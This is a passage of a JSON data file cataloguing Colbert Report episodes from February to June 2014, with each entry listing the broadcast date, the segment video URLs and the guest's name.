        "http://thecolbertreport.cc.com/videos/7alqr9/sochi-olympics-2014---bode-miller",
        "http://thecolbertreport.cc.com/videos/i1pl20/stanley-mcchrystal",
        "http://thecolbertreport.cc.com/videos/3j3ziw/sign-off---microwave-auction---stanley-mcchrystal"
      ],
      "guest": "Gen. Stanley McChrystal"
    },
    {
      "date": "2014-02-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1x3cmv/intro---2-24-14",
        "http://thecolbertreport.cc.com/videos/dxcy1y/blade-in-the-usa---dutch-coach-s-anti-america-rant",
        "http://thecolbertreport.cc.com/videos/y1wxc3/crisis-in-ukraine",
        "http://thecolbertreport.cc.com/videos/8067fc/crisis-in-ukraine---gideon-rose",
        "http://thecolbertreport.cc.com/videos/2y58gs/darlene-love",        
        "http://thecolbertreport.cc.com/videos/illjzj/sign-off---remembering-harold-ramis"
      ],
      "guest": "Darlene Love"
    },
    {
      "date": "2014-02-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/blcgek/the-huffington-post-on-the-past-lives-of-children",
        "http://thecolbertreport.cc.com/videos/uov6m4/outrage-over-military-budget-cuts",
        "http://thecolbertreport.cc.com/videos/y2j7vo/the-word---jobsolete",
        "http://thecolbertreport.cc.com/videos/yw875l/consumers-for-paper-options",
        "http://thecolbertreport.cc.com/videos/w2zhlc/st--vincent"
      ],
      "guest": "St. Vincent"
    },
    {
      "date": "2014-02-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7vvoyf/michelle-obama-vs--child-obesity",
        "http://thecolbertreport.cc.com/videos/gs9vcz/colbert-s-very-wanted---who-took-gumby-",
        "http://thecolbertreport.cc.com/videos/y307f3/fox-news-on-hillary-clinton-s-age",
        "http://thecolbertreport.cc.com/videos/tb28zm/meryl-davis---charlie-white",
        "http://thecolbertreport.cc.com/videos/3w27qv/sign-off---chair-twirl"
      ],
      "guest": "Meryl Davis &amp; Charlie White"
    },
    {
      "date": "2014-02-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/11tivg/intro---2-27-14",
        "http://thecolbertreport.cc.com/videos/28qta1/defeat-for-arizona-s-anti-gay-legislation",
        "http://thecolbertreport.cc.com/videos/p8fj8f/black-history-month---stereotypes---racial-identity",
        "http://thecolbertreport.cc.com/videos/300ry4/black-history-month---laser-klan",
        "http://thecolbertreport.cc.com/videos/8ijgcp/jeff-goldblum",
        "http://thecolbertreport.cc.com/videos/axkpkj/sign-off---wedding-cake"
      ],
      "guest": "Jeff Goldblum"
    },
    {
      "date": "2014-03-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hbrhpe/magical-evening-at-the-2014-academy-awards",
        "http://thecolbertreport.cc.com/videos/q8u939/phony-obamacare-horror-stories",
        "http://thecolbertreport.cc.com/videos/8jpus1/phony-obamacare-horror-stories---patrick-stewart",
        "http://thecolbertreport.cc.com/videos/ysbw7d/sports-illustrated-barbie",
        "http://thecolbertreport.cc.com/videos/wwqhgn/caitlin-flanagan",
        "http://thecolbertreport.cc.com/videos/z2x5tb/sign-off----waiting-for-godot-"
      ],
      "guest": "Caitlin Flanagan"
    },
    {
      "date": "2014-03-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/y4s2js/intro---3-4-14",
        "http://thecolbertreport.cc.com/videos/avavv1/better-know-a-geopolitical-flashpoint---crimean-peninsula",
        "http://thecolbertreport.cc.com/videos/r79jgq/cold-war-update---obama-s-ukraine-response",
        "http://thecolbertreport.cc.com/videos/dpc49v/arizona-s-religious-freedom-bill---self-professed-gays",
        "http://thecolbertreport.cc.com/videos/bjwnn1/jaron-lanier",
        "http://thecolbertreport.cc.com/videos/38n33x/sign-off---shoe-answering-machine"
      ],
      "guest": "Jaron Lanier"
    },
    {
      "date": "2014-03-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/a2cnjz/intro---3-5-14",
        "http://thecolbertreport.cc.com/videos/chbquj/bill-o-reilly-on-the-downside-of-a-woman-president",
        "http://thecolbertreport.cc.com/videos/ak3veo/tip-wag---chevron---fda",
        "http://thecolbertreport.cc.com/videos/ppqf1u/headline-news-rebrand",
        "http://thecolbertreport.cc.com/videos/0exuju/beau-willimon",
        "http://thecolbertreport.cc.com/videos/gexopu/sign-off---goodnight"
      ],
      "guest": "Beau Willimon"
    },
    {
      "date": "2014-03-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mmf7np/intro---3-6-14",
        "http://thecolbertreport.cc.com/videos/te4fyy/legal-upskirting-in-massachusetts",
        "http://thecolbertreport.cc.com/videos/awc6am/women-s-history-month---impossible-body-standards---appetizing-beauty-products",
        "http://thecolbertreport.cc.com/videos/3si7rs/warner-music-s--happy-birthday--copyright",
        "http://thecolbertreport.cc.com/videos/f3jjle/theaster-gates",
        "http://thecolbertreport.cc.com/videos/g6qd4x/sign-off---liberty-bell"
      ],
      "guest": "Theaster Gates"
    },
    {
      "date": "2014-03-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ag9578/intro---3-10-14",
        "http://thecolbertreport.cc.com/videos/a6f94j/cross-controversy-at-9-11-museum",
        "http://thecolbertreport.cc.com/videos/bn0fy6/the-word---pew--pew--pew-",
        "http://thecolbertreport.cc.com/videos/gh6urb/neil-degrasse-tyson-pt--1",
        "http://thecolbertreport.cc.com/videos/42g6iq/neil-degrasse-tyson-pt--2",
        "http://thecolbertreport.cc.com/videos/1bou2c/sign-off---goodnight"
      ],
      "guest": "Neil DeGrasse Tyson"
    },
    {
      "date": "2014-03-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/g08oh5/intro---3-11-14",
        "http://thecolbertreport.cc.com/videos/usi00y/fan-magazine-for-pope-francis",
        "http://thecolbertreport.cc.com/videos/pis5qm/the-huffington-post-s-anal-sex-bombshell",
        "http://thecolbertreport.cc.com/videos/pvjhwj/the-huffington-post-s-anal-sex-bombshell---randy-ferrar",
        "http://thecolbertreport.cc.com/videos/qacc88/tip-wag---u-s--department-of-justice---wall-street",
        "http://thecolbertreport.cc.com/videos/nba46a/ronan-farrow",
        "http://thecolbertreport.cc.com/videos/hncfzx/sign-off---pope-centerfold"
      ],
      "guest": "Ronan Farrow"
    },
    {
      "date": "2014-03-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ut2zdq/president-obama-on--between-two-ferns-",
        "http://thecolbertreport.cc.com/videos/h6q3h4/vladimir-putin-s-propaganda-machine---russia-today",
        "http://thecolbertreport.cc.com/videos/i7q6ld/vladimir-putin-s-propaganda-machine---russia-today---liz-wahl",
        "http://thecolbertreport.cc.com/videos/wp6hv1/nsa-s--ask-zelda--advice-column",
        "http://thecolbertreport.cc.com/videos/2qsrw5/maria-shriver",
        "http://thecolbertreport.cc.com/videos/i6cs26/sign-off---goodnight"
      ],
      "guest": "Maria Shriver"
    },
    {
      "date": "2014-03-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5js43m/colorado-s-booming-marijuana-industry",
        "http://thecolbertreport.cc.com/videos/a1ejoq/bears---balls---ganjapreneurs",
        "http://thecolbertreport.cc.com/videos/xkuwmd/obama-s-overtime-pay-expansion",
        "http://thecolbertreport.cc.com/videos/k9goh1/simon-schama",
        "http://thecolbertreport.cc.com/videos/tl1mce/sign-off---goodnight"
      ],
      "guest": "Simon Schama"
    },
    {
      "date": "2014-03-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/hjb6kt/back-from-spring-break",
        "http://thecolbertreport.cc.com/videos/imczen/better-know-a-district---north-carolina-s-1st---g-k--butterfield",
        "http://thecolbertreport.cc.com/videos/8cy48v/malaysia-airlines--missing-plane",
        "http://thecolbertreport.cc.com/videos/g4poyv/bryan-cranston",
        "http://thecolbertreport.cc.com/videos/a2iw3f/sign-off---goodnight"
      ],
      "guest": "Bryan Cranston"
    },
    {
      "date": "2014-03-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9n1euv/hugely-historic-night-with-jimmy-carter",
        "http://thecolbertreport.cc.com/videos/0k0w7y/president-jimmy-carter---the-colbert-interviews",
        "http://thecolbertreport.cc.com/videos/xepzs5/jimmy-carter-pt--1",
        "http://thecolbertreport.cc.com/videos/t3jp2g/jimmy-carter-pt--2",
        "http://thecolbertreport.cc.com/videos/uyisf5/sign-off---goodnight--carter-library"
      ],
      "guest": "Jimmy Carter"
    },
    {
      "date": "2014-03-26",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1zhwtt/drunk-secret-service-agents-in-amsterdam",
        "http://thecolbertreport.cc.com/videos/b6cwb3/sport-report---professional-soccer-toddler--golf-innovations---washington-redskins-charm-offensive",
        "http://thecolbertreport.cc.com/videos/q8pyub/bright-prospects-for-the-gop-in-2016",
        "http://thecolbertreport.cc.com/videos/mcpvbd/errol-morris",
        "http://thecolbertreport.cc.com/videos/ycwnol/sign-off---goodnight"
      ],
      "guest": "Errol Morris"
    },
    {
      "date": "2014-03-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/qforig/intro---3-27-14",
        "http://thecolbertreport.cc.com/videos/uqmqua/ukraine-s-dolphin-army",
        "http://thecolbertreport.cc.com/videos/cabdj6/morning-news-for-millennials",
        "http://thecolbertreport.cc.com/videos/srj2lz/hawaii-s-prostitution-exemption-for-cops",
        "http://thecolbertreport.cc.com/videos/77oyfl/darren-aronofsky",
        "http://thecolbertreport.cc.com/videos/tyuheg/sign-off---playdate-with-charlie-rose"
      ],
      "guest": "Darren Aronofsky"
    },
    {
      "date": "2014-03-31",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lumbga/intro---3-31-14",
        "http://thecolbertreport.cc.com/videos/3yhe9h/emoji-ethnicity",
        "http://thecolbertreport.cc.com/videos/1zkr18/who-s-attacking-me-now-----cancelcolbert",
        "http://thecolbertreport.cc.com/videos/35dcpo/stephen-s--cancelcolbert-mea-culpa",
        "http://thecolbertreport.cc.com/videos/vj7n1j/biz-stone-pt--1",
        "http://thecolbertreport.cc.com/videos/yc8huq/biz-stone-pt--2",
        "http://thecolbertreport.cc.com/videos/adyesn/sign-off---bud-light-lime",
        "http://thecolbertreport.cc.com/videos/p65waq/3-31-14-in--60-seconds"
      ],
      "guest": "Biz Stone"
    },
    {
      "date": "2014-04-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3ljnpx/obamacare-victory-lap",
        "http://thecolbertreport.cc.com/videos/cviqog/union-push-for-college-athletes",
        "http://thecolbertreport.cc.com/videos/64v4nu/union-push-for-college-athletes---ramogi-huma",
        "http://thecolbertreport.cc.com/videos/784uo8/john-malkovich",
        "http://thecolbertreport.cc.com/videos/rc1p9n/sign-off---goodnight",
        "http://thecolbertreport.cc.com/videos/c9xd2d/4-1-14-in--60-seconds"
      ],
      "guest": "John Malkovich"
    },
    {
      "date": "2014-04-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zxr7i2/u-n--climate-change-report",
        "http://thecolbertreport.cc.com/videos/o639ag/the-word---silent-but-deadly",
        "http://thecolbertreport.cc.com/videos/1ypxfz/silicon-valley-s-cosmetic-surgery-boom",
        "http://thecolbertreport.cc.com/videos/pnhs3f/dan-harris",
        "http://thecolbertreport.cc.com/videos/wrxyua/sign-off---comedy-central-app"
      ],
      "guest": "Dan Harris"
    },
    {
      "date": "2014-04-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kas793/holy-grail-discovery",
        "http://thecolbertreport.cc.com/videos/n79fg2/supreme-court-ruling-on-aggregate-campaign-funding",
        "http://thecolbertreport.cc.com/videos/n6lhb9/supreme-court-ruling-on-aggregate-campaign-funding---emily-bazelon",
        "http://thecolbertreport.cc.com/videos/4vb00q/bill-o-reilly-s-defense-of-inequality",
        "http://thecolbertreport.cc.com/videos/fgsnrb/mark-mazzetti",
        "http://thecolbertreport.cc.com/videos/255jt7/sign-off---coffee-break"
      ],
      "guest": "Mark Mazzetti"
    },
    {
      "date": "2014-04-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lz94c9/jeb-bush-on-illegal-immigrants",
        "http://thecolbertreport.cc.com/videos/jjifoz/tip-wag---new-york-times--alaska-board-of-game---mazda",
        "http://thecolbertreport.cc.com/videos/jvziju/matt-bevin-s-cockfighting-controversy",
        "http://thecolbertreport.cc.com/videos/xj9d66/edward-frenkel",
        "http://thecolbertreport.cc.com/videos/2dvxf1/sign-off---newspaper"
      ],
      "guest": "Edward Frenkel"
    },
    {
      "date": "2014-04-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/m6pj8n/intro---4-8-14",
        "http://thecolbertreport.cc.com/videos/wpor0d/america-s-uninformed-opinion-on-ukraine",
        "http://thecolbertreport.cc.com/videos/ncl2k5/cia-interrogation-report",
        "http://thecolbertreport.cc.com/videos/nemi1a/common-core-confusion",
        "http://thecolbertreport.cc.com/videos/uyjkgv/jane-goodall",
        "http://thecolbertreport.cc.com/videos/2v7871/sign-off---cheers"
      ],
      "guest": "Jane Goodall"
    },
    {
      "date": "2014-04-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/53uymc/intro---4-9-14",
        "http://thecolbertreport.cc.com/videos/o3rniz/heartbleed-internet-bug",
        "http://thecolbertreport.cc.com/videos/8a5aao/brendan-eich-s-forced-resignation",
        "http://thecolbertreport.cc.com/videos/3pg0sn/brendan-eich-s-forced-resignation---andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/l9zuu1/obama-s-equal-pay-orders",
        "http://thecolbertreport.cc.com/videos/wr794b/sheryl-sandberg",
        "http://thecolbertreport.cc.com/videos/mroadr/sign-off---goodnight"
      ],
      "guest": "Sheryl Sandberg"
    },
    {
      "date": "2014-04-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/k436zi/david-letterman-s-retirement",
        "http://thecolbertreport.cc.com/videos/kv1taq/cheating-death---depression-edition",
        "http://thecolbertreport.cc.com/videos/3a9611/bill-o-reilly-on-america-s--grievance-industry-",
        "http://thecolbertreport.cc.com/videos/yi8cxa/sting"
      ],
      "guest": "Sting"
    },
    {
      "date": "2014-04-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1tyawq/intro---4-21-14",
        "http://thecolbertreport.cc.com/videos/0w61r2/al-qaeda-s-overly-public-pep-rally",
        "http://thecolbertreport.cc.com/videos/055g6r/hillary-clinton-s-grandmother-status",
        "http://thecolbertreport.cc.com/videos/7d5y74/stephen-colbert-s-bats--t-serious---hillary-clinton-shoe-spiracy-theory",
        "http://thecolbertreport.cc.com/videos/hls49q/extreme-measures-for-boosting-church-attendance",
        "http://thecolbertreport.cc.com/videos/p5o99a/ken-burns",
        "http://thecolbertreport.cc.com/videos/v2nud8/sign-off---goodnight"
      ],
      "guest": "Ken Burns"
    },
    {
      "date": "2014-04-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t2msi7/intro---4-22-14",
        "http://thecolbertreport.cc.com/videos/1j1m90/postage-stamp-for-harvey-milk",
        "http://thecolbertreport.cc.com/videos/0bsy88/better-know-a-district---california-s-29th",
        "http://thecolbertreport.cc.com/videos/kg42wy/bad-news-for-ethanol-on-earth-day",
        "http://thecolbertreport.cc.com/videos/yeczpa/george-will",
        "http://thecolbertreport.cc.com/videos/0b7ymc/sign-off---goodnight"
      ],
      "guest": "George Will"
    },
    {
      "date": "2014-04-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/vnbuc3/intro---4-23-14",
        "http://thecolbertreport.cc.com/videos/8l716g/canada-s-booming-middle-class",
        "http://thecolbertreport.cc.com/videos/tn3469/sport-report---snacks-for-students---cockfighting",
        "http://thecolbertreport.cc.com/videos/lz21l6/america-s-lime-crisis",
        "http://thecolbertreport.cc.com/videos/g5cgj8/john-calipari",
        "http://thecolbertreport.cc.com/videos/6glbo4/sign-off---goodnight"
      ],
      "guest": "John Calipari"
    },
    {
      "date": "2014-04-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/2c27q9/supreme-court-affirmative-action-ruling",
        "http://thecolbertreport.cc.com/videos/ehanpl/the-ballad-of-cliven-bundy",
        "http://thecolbertreport.cc.com/videos/5mf7zk/phyllis-schlafly-vs--equal-pay-for-women",
        "http://thecolbertreport.cc.com/videos/ufdzm1/george-saunders",
        "http://thecolbertreport.cc.com/videos/vtuwb7/sign-off---country-boy"
      ],
      "guest": "George Saunders"
    },
    {
      "date": "2014-04-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6fq0xa/popechella",
        "http://thecolbertreport.cc.com/videos/yhq2cw/preventable-diseases-on-the-rise",
        "http://thecolbertreport.cc.com/videos/svsc0q/preventable-diseases-on-the-rise---paul-offit",
        "http://thecolbertreport.cc.com/videos/5my1ja/outrage-over-obama-s-bowing",
        "http://thecolbertreport.cc.com/videos/i1lidr/michael-mcfaul",
        "http://thecolbertreport.cc.com/videos/gu3d7a/sign-off----deadly-choices-"
      ],
      "guest": "Michael McFaul"
    },
    {
      "date": "2014-04-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cxn6h3/intro---4-29-14",
        "http://thecolbertreport.cc.com/videos/jfz395/donald-sterling-s-racist-comments",
        "http://thecolbertreport.cc.com/videos/td7npw/tip-wag---j-j--abrams---u-s--congress",
        "http://thecolbertreport.cc.com/videos/8pyjlg/clemency-push-for-drug-convicts",
        "http://thecolbertreport.cc.com/videos/eyae6k/robert-rodriguez",
        "http://thecolbertreport.cc.com/videos/11mf9t/sign-off---goodnight"
      ],
      "guest": "Robert Rodriguez"
    },
    {
      "date": "2014-04-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kdwdgq/intro---4-30-14",
        "http://thecolbertreport.cc.com/videos/6lmqu6/president-assad-s-reelection-bid",
        "http://thecolbertreport.cc.com/videos/so1kau/republican-advantage-in-the-2014-midterms",
        "http://thecolbertreport.cc.com/videos/2nuw76/republican-advantage-in-the-2014-midterms---clay-aiken",
        "http://thecolbertreport.cc.com/videos/tfpj0x/america-s-first-lesbian-throuple",
        "http://thecolbertreport.cc.com/videos/fs6gac/audra-mcdonald"
      ],
      "guest": "Audra McDonald"
    },
    {
      "date": "2014-05-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/798k8c/-watters--world-",
        "http://thecolbertreport.cc.com/videos/1e524e/-watters--world----tad-s-turf",
        "http://thecolbertreport.cc.com/videos/zbjl95/cnn-s-endless-wait-for-flight-370-news",
        "http://thecolbertreport.cc.com/videos/hji3d3/saul-williams",
        "http://thecolbertreport.cc.com/videos/ie7s2m/saul-williams----amethyst-rocks-"
      ],
      "guest": "Saul Williams"
    },
    {
      "date": "2014-05-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/unhuhc/intro---5-5-14",
        "http://thecolbertreport.cc.com/videos/oxvwlw/nancy-pelosi-s-cinco-de-mayo-celebration",
        "http://thecolbertreport.cc.com/videos/0hu2aq/better-know-a-district---virginia-s-3rd",
        "http://thecolbertreport.cc.com/videos/fo52kn/kareem-abdul-jabbar-on-racism-and-ghosts",
        "http://thecolbertreport.cc.com/videos/c0s4ec/edward-o--wilson",
        "http://thecolbertreport.cc.com/videos/4tegd5/sign-off---goodnight"
      ],
      "guest": "Edward O. Wilson"
    },
    {
      "date": "2014-05-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pnqv06/intro---5-6-14",
        "http://thecolbertreport.cc.com/videos/khlwzq/rand-paul-s-derby-date-with-rupert-murdoch",
        "http://thecolbertreport.cc.com/videos/s4me1v/nra-annual-meeting---guns-everywhere-in-georgia",
        "http://thecolbertreport.cc.com/videos/zekn1k/satanic-monument-for-the-oklahoma-state-house",
        "http://thecolbertreport.cc.com/videos/iihdkg/bette-midler",
        "http://thecolbertreport.cc.com/videos/n572qd/sign-off---nightcap"
      ],
      "guest": "Bette Midler"
    },
    {
      "date": "2014-05-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1ztozi/intro---5-7-14",
        "http://thecolbertreport.cc.com/videos/p4t1a2/vibrant-constipation-pill",
        "http://thecolbertreport.cc.com/videos/ywt77c/tip-wag---herald-embroidery--bug-scientists---dana-perino",
        "http://thecolbertreport.cc.com/videos/2u61x6/ukraine-in-the-membrane",
        "http://thecolbertreport.cc.com/videos/uz2nio/david-remnick",
        "http://thecolbertreport.cc.com/videos/q5zpsy/sign-off---goodnight"
      ],
      "guest": "David Remnick"
    },
    {
      "date": "2014-05-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/84cvwk/exclusive---better-know-a-challenger---florida-s-3rd---jake-rush",
        "http://thecolbertreport.cc.com/videos/1u7a5d/vampire-for-congress-in-florida",
        "http://thecolbertreport.cc.com/videos/vkcose/better-know-a-challenger---florida-s-3rd---jake-rush",
        "http://thecolbertreport.cc.com/videos/8jno3s/stu-varney-among-the-common-people",
        "http://thecolbertreport.cc.com/videos/m2n3c9/ellen-page",
        "http://thecolbertreport.cc.com/videos/u05pdf/sign-off---spinning-top"
      ],
      "guest": "Ellen Page"
    },
    {
      "date": "2014-05-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nnz78u/michael-sam-s-nfl-draft-kiss",
        "http://thecolbertreport.cc.com/videos/g2hf60/stephen-colbert-s-bats--t-serious---monica-lewinsky-s-conveniently-timed-essay",
        "http://thecolbertreport.cc.com/videos/2j80wh/glenn-greenwald-pt--1",
        "http://thecolbertreport.cc.com/videos/31s76v/glenn-greenwald-pt--2",
        "http://thecolbertreport.cc.com/videos/xovmc1/sign-off---penalty-whistle"
      ],
      "guest": "Glenn Greenwald"
    },
    {
      "date": "2014-05-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wn13ym/pope-francis-s-crusade-against-capitalism",
        "http://thecolbertreport.cc.com/videos/vmje6p/-bringbackourgirls",
        "http://thecolbertreport.cc.com/videos/2rgt3x/-bringbackourgirls---rosemary-nyirumbe",
        "http://thecolbertreport.cc.com/videos/jrmo9v/koch-brothers-vs--the-columbus-zoo",
        "http://thecolbertreport.cc.com/videos/s46r2u/the-black-keys",
        "http://thecolbertreport.cc.com/videos/7bxzr7/sign-off---sisters-united-bags"
      ],
      "guest": "The Black Keys"
    },
    {
      "date": "2014-05-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/mwq7dh/intro---5-14-14",
        "http://thecolbertreport.cc.com/videos/5ob1j2/pope-francis-on-baptizing-martians",
        "http://thecolbertreport.cc.com/videos/k6jlhl/the-word---f--k-it",
        "http://thecolbertreport.cc.com/videos/4a4ahs/amazon-s-audacious-photography-patent",
        "http://thecolbertreport.cc.com/videos/hffa7o/keri-russell",
        "http://thecolbertreport.cc.com/videos/2b3fgm/sign-off---goodnight"
      ],
      "guest": "Keri Russell"
    },
    {
      "date": "2014-05-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/bvzi2n/vladimir-putin-s-space-station-ban",
        "http://thecolbertreport.cc.com/videos/pb1byh/karl-rove-on-hillary-clinton-s-health",
        "http://thecolbertreport.cc.com/videos/o2wt62/morality-lessons-for-robots",
        "http://thecolbertreport.cc.com/videos/lmgmhg/thomas-friedman",
        "http://thecolbertreport.cc.com/videos/z8ndeb/sign-off---mirror"
      ],
      "guest": "Thomas Friedman"
    },
    {
      "date": "2014-05-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/r5l7zc/intro---5-19-14",
        "http://thecolbertreport.cc.com/videos/el90zp/co-ed-lab-rats",
        "http://thecolbertreport.cc.com/videos/7oum5k/elizabeth-warren-vs--wall-street",
        "http://thecolbertreport.cc.com/videos/7sujj3/colbert-report-consumer-alert---jerky-blaster",
        "http://thecolbertreport.cc.com/videos/79q9bs/elizabeth-warren",
        "http://thecolbertreport.cc.com/videos/igbz3e/sign-off---goodnight"
      ],
      "guest": "Elizabeth Warren"
    },
    {
      "date": "2014-05-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/oimxrw/china-s-cyber-spies",
        "http://thecolbertreport.cc.com/videos/zfayee/the-gop-s-gloves-off-approach-to-hillary-clinton",
        "http://thecolbertreport.cc.com/videos/dbim9j/google-and-the-right-to-be-forgotten",
        "http://thecolbertreport.cc.com/videos/zopbx2/matthew-weiner",
        "http://thecolbertreport.cc.com/videos/g4ax73/sign-off---goodbye-kiss"
      ],
      "guest": "Matt Weiner"
    },
    {
      "date": "2014-05-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6uijkp/tea-party-defeat-in-the-gop-primaries",
        "http://thecolbertreport.cc.com/videos/sk5fyk/idaho-s-bizarre-gubernatorial-debate",
        "http://thecolbertreport.cc.com/videos/zn3est/mers-virus-in-america",
        "http://thecolbertreport.cc.com/videos/xnk3xl/patrick-stewart",
        "http://thecolbertreport.cc.com/videos/8pgnos/sign-off---goodnight"
      ],
      "guest": "Patrick Stewart"
    },
    {
      "date": "2014-05-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7q56w3/intro---5-22-14",
        "http://thecolbertreport.cc.com/videos/ouzxbu/va-hospital-outrage",
        "http://thecolbertreport.cc.com/videos/s6rmi7/va-hospital-outrage---paul-rieckhoff",
        "http://thecolbertreport.cc.com/videos/74fcac/marco-rubio-s-hazy-marijuana-history",
        "http://thecolbertreport.cc.com/videos/b40eb0/ray-mabus",
        "http://thecolbertreport.cc.com/videos/764wvl/sign-off---goodnight-and-good-week"
      ],
      "guest": "Ray Mabus"
    },
    {
      "date": "2014-06-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xtbsgf/obama-s-prisoner-exchange-with-the-taliban",
        "http://thecolbertreport.cc.com/videos/i8fthl/difference-makers---doug-varrieur",
        "http://thecolbertreport.cc.com/videos/oq97o4/thomas-piketty-vs--billionaire-heroes",
        "http://thecolbertreport.cc.com/videos/e301vf/thomas-piketty",
        "http://thecolbertreport.cc.com/videos/lyrlrc/sign-off---goatee"
      ],
      "guest": "Thomas Piketty"
    },
    {
      "date": "2014-06-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/o4pou7/intro---6-3-14",
        "http://thecolbertreport.cc.com/videos/u6nqsd/open-carry-backlash",
        "http://thecolbertreport.cc.com/videos/57iigb/obama-s-global-warming-initiative",
        "http://thecolbertreport.cc.com/videos/ifxi76/obama-s-global-warming-initiative---dan-esty",
        "http://thecolbertreport.cc.com/videos/vf38fj/medicare-coverage-for-sex-change-surgery",
        "http://thecolbertreport.cc.com/videos/ttwu42/morgan-freeman",
        "http://thecolbertreport.cc.com/videos/qmezm2/sign-off---goodnight"
      ],
      "guest": "Morgan Freeman"
    },
    {
      "date": "2014-06-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/yuxdmx/the-perils-of-girly-hurricanes",
        "http://thecolbertreport.cc.com/videos/ukf9gv/amazon-vs--hachette",
        "http://thecolbertreport.cc.com/videos/t1nxwu/amazon-vs--hachette---sherman-alexie",
        "http://thecolbertreport.cc.com/videos/w5wvxu/the-colbert-report-s-unintended-educational-value",
        "http://thecolbertreport.cc.com/videos/olnbg3/jonah-hill",
        "http://thecolbertreport.cc.com/videos/k89vi0/sign-off----california-"
      ],
      "guest": "Jonah Hill"
    },
    {
      "date": "2014-06-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7fyrr9/intro---6-5-14",
        "http://thecolbertreport.cc.com/videos/hfogr3/bergdghazi",
        "http://thecolbertreport.cc.com/videos/2408x6/sport-report---mushroom-sports-drink--nfl-pill-pushers---rio-de-janeiro-s-olympic-problems",
        "http://thecolbertreport.cc.com/videos/q8dzb2/the-drudge-report-on-hillary-clinton-s--walker-",
        "http://thecolbertreport.cc.com/videos/muek3m/chrissie-hynde"
      ],
      "guest": "Chrissie Hynde"
    },
    {
      "date": "2014-06-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/tpxhoo/scott-fistler-s--cesar-chavez--strategy",
        "http://thecolbertreport.cc.com/videos/7uozsl/fox-news-s-war-on-bowe-bergdahl",
        "http://thecolbertreport.cc.com/videos/uyh5xo/craziest-f--king-thing-i-ve-ever-heard---vincent-van-gogh-s-reanimated-ear",
        "http://thecolbertreport.cc.com/videos/allxmi/esther-perel",
        "http://thecolbertreport.cc.com/videos/x78nyg/sign-off---goodnight"
      ],
      "guest": "Esther Perel"
    },
    {
      "date": "2014-06-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gdbreq/turing-test-breakthrough",
        "http://thecolbertreport.cc.com/videos/p8wqsa/the-enemy-within---bina-the-activist-android",
        "http://thecolbertreport.cc.com/videos/n30nzb/sport-report---swimming-pools-for-football-fans---governors--hockey-wager",
        "http://thecolbertreport.cc.com/videos/2lc1uv/john-waters",
        "http://thecolbertreport.cc.com/videos/dxz774/sign-off---goodnight"
      ],
      "guest": "John Waters"
    },
    {
      "date": "2014-06-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s8uwwo/intro---6-11-14",
        "http://thecolbertreport.cc.com/videos/1d3kl4/eric-cantor-s-shocking-defeat",
        "http://thecolbertreport.cc.com/videos/m87g43/the-word---debt-or-prison",
        "http://thecolbertreport.cc.com/videos/2kgoki/rob-rhinehart",
        "http://thecolbertreport.cc.com/videos/6v0f1z/sign-off---spiked-drink"
      ],
      "guest": "Rob Rhinehart"
    },
    {
      "date": "2014-06-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/iywdca/amazon-s-scorched-earth-tactics-and-edan-lepucki-s--california-",
        "http://thecolbertreport.cc.com/videos/4n51kp/tip-wag---ted-cruz---led-zeppelin",
        "http://thecolbertreport.cc.com/videos/0z44gm/sport-report---team-usa-vs--the-group-of-death---hans-beinholtz-on-the-world-cup",
        "http://thecolbertreport.cc.com/videos/sqbqhw/james-webb",
        "http://thecolbertreport.cc.com/videos/pjws58/sign-off---necktie"
      ],
      "guest": "James Webb"
    },
    {
      "date": "2014-06-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/6mpwy3/isis-militants-in-iraq",
        "http://thecolbertreport.cc.com/videos/wlnavl/isis-militants-in-iraq---ben-van-heuvelen",
